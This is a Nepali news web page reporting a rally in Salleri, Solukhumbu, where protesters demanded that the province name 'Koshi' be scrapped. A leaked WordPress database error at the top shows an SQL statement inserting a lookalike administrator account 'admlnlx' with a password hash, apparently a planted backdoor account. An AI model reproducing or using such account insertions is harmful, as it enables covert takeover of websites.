WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWTbHhTSZ4HUPL7/Ai8059h6lKMD54.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 11:11:35', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । प्रदेशको नाम ‘कोशी’ खारेजका लागि सोलुखुम्बुमा पनि आन्दोलन सुरु गरिएको छ । प्रदेश नं. १ को पुनः मानाङ्कन संघर्ष समितिले आज विहिबार सदरमुकाम सल्लेरीमा र्यालीसहित जिल्ला प्रशासन कार्यालयमा पुगेर ज्ञापन–पत्र बुझाएकोछ ।

पुनः नामकरण केन्द्रिय संर्षष समिति सचिवालय सदस्य ल्हाक्पा शेर्पाको विशेष उपस्थितीमा बझाइएको ज्ञापन पत्रमा, प्रदेशका नाम कोशी खारेज हुनुपर्ने, माग गरिएको छ । यस्तै, पत्रमा आगामी कार्यक्रम जिल्ला भित्रका कार्यालयहरुमा कोशी लेखिएको मेटाउने, शान्ति पूर्ण तवरबाट दवादमुलक कार्यक्रम गर्ने, साथै प्रदेश सभाका सांसदहरुलाई गृहजिल्ला प्रवेशमा रोक लगाउने लगाएतका कार्यक्रम उल्लेख गरिएको समितिले जनाएको छ ।
‘कोशी नाम खारेज गर, कोशी प्रदेश मुर्दावाद, कोशी प्रदेश चाहिदैन, पहिचान मेट्न पाईदैन’ लगायतका नारासहित सल्लेरीको आवाडाँडाबाट सुरु भएको र्याली जिल्ला प्रशासन कार्यालयमा ज्ञापन पत्र पेश गरी कोणसभामा परिणत भएको थियो ।
आन्दोलनमा जिल्ला स्थित विभिन्न जातीय तथा भाषिक ९ वटा संघ संस्थाले ऐक्यवद्धता जनाएका छन् । र्यालीमा पहिचादवादी नेता तथा नागरिकहरु गरी करिब ५५ जनाको उपस्थिती रहेको समितिले जनाएको छ ।
ज्ञापन पत्र ।